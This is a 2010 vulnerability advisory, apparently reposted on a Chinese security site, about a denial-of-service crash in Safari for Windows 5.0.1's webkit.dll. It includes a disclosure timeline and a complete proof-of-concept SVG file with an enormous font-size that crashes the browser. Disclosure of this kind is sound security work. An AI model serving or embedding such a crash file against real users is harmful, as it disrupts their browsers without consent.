首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Safari for windows Invalid SGV text style Webkit.dll DoS
来源:mustlive[at]websecurity.com.ua 作者:MustLive 发布时间:2010-08-31  
###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Vendor URL:www.apple.com
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notify :Yes exploit available :YES
###################################################

Safari browser for windows is prone vulnerable to a Denial of
service condition , this issue affects webkit.dll and cause a
crash when Safari try to render a SGV image with a very long
font size text style.



############
versions
############

Safari for windows 5.0.1 (7533.17.8)
on windows 7 ultimate fully patched.


Safari for windows windows 5.0.1 (7533.17.8)
on windows xp home sp3 fully patched


############
Timeline
############

Discovered:19-08-2010
vendor notify:25-08-2010
Vendor response:26-08-2010
Disclosure: 30-09-2010

####################
Proof Of Concept
####################

Save This code as image.svg and open it with Safari,look
i have add some "extra" pixels in font size text style.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# �nd ###############

Thnx To Climbo for his patience and support.

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple QuickTime "_Marshaled_pU
·Apple QuickTime 7.6.7 _Marshal
·Mereo v1.9.2 Remote HTTP Serve
·SnackAmp 3.1.2 Malicious SMP B
·Windows 7 / Vista Backup Utili
·Spybot-S&D blindman.exe DLL Hi
·Microsoft Internet explorer 8
·MPLAB IDE .mcp .mcw DLL Hijack
·web wiz newspad v1.03 Database
·mBlogger v1.0.04 (viewpost.php
·Microsoft Windows Based Script
·Leadtools ActiveX Common Dialo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved